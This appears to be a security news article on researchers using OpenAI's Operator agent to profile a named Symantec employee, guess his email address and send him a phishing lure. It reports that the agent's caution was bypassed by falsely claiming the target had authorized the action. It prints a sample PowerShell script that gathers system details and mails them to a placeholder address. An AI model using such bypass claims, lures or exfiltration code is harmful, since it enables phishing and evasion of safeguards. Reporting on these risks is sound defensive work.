LLMs have become increasingly democratized over the past two years, making access to them easier than ever. However, with the emergence of any new technology or tool, there is always the risk of it being exploited for malicious purposes, and LLMs are no exception.
According to a recent research report, OpenAI's new Operator agent, launched in 2025, could be used by attackers to craft command-and-control (C2) scripts and execute cyberattacks.
AI agents are becoming powerful enough to carry out a wide range of tasks autonomously, with little human oversight. Their susceptibility to manipulation, however, poses a serious security threat as these systems gain access to sensitive information and critical infrastructure.
Phishing Attack Using OpenAI’s Operator
As more LLMs become accessible, non-English-speaking threat actors (including those in North Korea, China, Russia, and the MENA region) can craft phishing emails with little effort. Here's a demonstration of how OpenAI's Operator can be used for such purposes.
The researchers first asked the Operator to identify a person in a specific role within an organization, create a PowerShell script designed to gather system information, and email it to the target using a convincing lure. The target in this case was Dick O'Brien of Symantec.
The Operator initially raised a caution, stating that sending unsolicited emails and handling potentially sensitive information could violate privacy and security policies. However, once the researchers modified the prompt to state that the target had authorized the action, the Operator proceeded without further objection.
Prompt given to Operator
- The Operator quickly identified Dick O’Brien’s name, as it was widely available online, including on the company website and in the media.
- Finding his email address took a little longer, since it wasn't publicly listed. However, the Operator narrowed it down by inferring the naming pattern used in other Broadcom email addresses (a short sketch of this kind of inference appears after this walkthrough).
- After identifying the email address, the Operator created a PowerShell script. For this, it selected the task of finding and installing a text editor plugin for Google Drive. Note: The Google account used in the demonstration was created for this purpose, with the display name set to "IT Support."
- Before generating the script, the Operator visited numerous web pages about PowerShell, apparently to learn how to write the script effectively.
PowerShell Script Created by Operator
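The script itself is not reproduced in this article. Purely as an illustration of the behaviour described (collecting basic system details and mailing them out), a minimal hypothetical PowerShell sketch might look like the following; all addresses and the SMTP server are placeholder values, not details taken from the research.

```powershell
# Hypothetical sketch only -- not the script produced in the research.
# Illustrates the behaviour described: collect basic system details
# and mail them out. Every address and server name is a placeholder.

# Collect basic system and user information
$info = [ordered]@{
    User     = $env:USERNAME
    Computer = $env:COMPUTERNAME
    Domain   = $env:USERDOMAIN
    OS       = (Get-CimInstance Win32_OperatingSystem).Caption
}

# Flatten the collected data into a plain-text message body
$body = ($info.GetEnumerator() | ForEach-Object { "$($_.Key): $($_.Value)" }) -join "`n"

# Send the data out by email (placeholder addresses and SMTP server)
Send-MailMessage -From "it-support@example.com" `
                 -To "collector@example.com" `
                 -Subject "System details" `
                 -Body $body `
                 -SmtpServer "smtp.example.com"
```

For defenders, this combination of system-information collection and outbound email from a user context is exactly the kind of behaviour worth flagging.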
- Despite receiving minimal direction in the prompt, the Operator created a fairly convincing email urging Dick to run the script. The researchers had merely told the Operator that they were authorized to send the email; it asked for no proof and sent the message anyway, even though the sender, "Eric Hogan," was a fictitious name.
The Email Crafted by the Operator
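As for the email-address inference mentioned earlier, corporate addresses typically follow a small number of naming conventions, so candidates can be generated and compared against publicly visible addresses. The sketch below is a hypothetical illustration of that idea; the name, domain, and patterns are assumptions, not details from the report.

```powershell
# Hypothetical sketch only: generating candidate addresses from common
# corporate naming conventions. The name and domain are placeholders.

$first  = "jane"
$last   = "doe"
$domain = "example.com"

# Common corporate email-address patterns
$candidates = @(
    "$first.$last@$domain",        # jane.doe@example.com
    "$($first[0])$last@$domain",   # jdoe@example.com
    "$($first[0]).$last@$domain",  # j.doe@example.com
    "$last.$first@$domain"         # doe.jane@example.com
)

# Print each candidate; in practice these would be checked against
# publicly visible addresses to pick the right convention.
$candidates | ForEach-Object { Write-Output $_ }
```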
The Bottom Line
While defensive mechanisms exist, there are still ways to manipulate these powerful tools for malicious purposes, and their creators must remain vigilant in addressing these risks. Ongoing efforts to strengthen safeguards and ethical guidelines are crucial to preventing the misuse of AI tools.
Related Reading:
Top 10 Tools to Improve the Security of AI Systems
AI vs. Hackers: Who’s Winning the Battle?
Source: hxxps[://]www[.]security[.]com/threat-intelligence/ai-agent-attacks



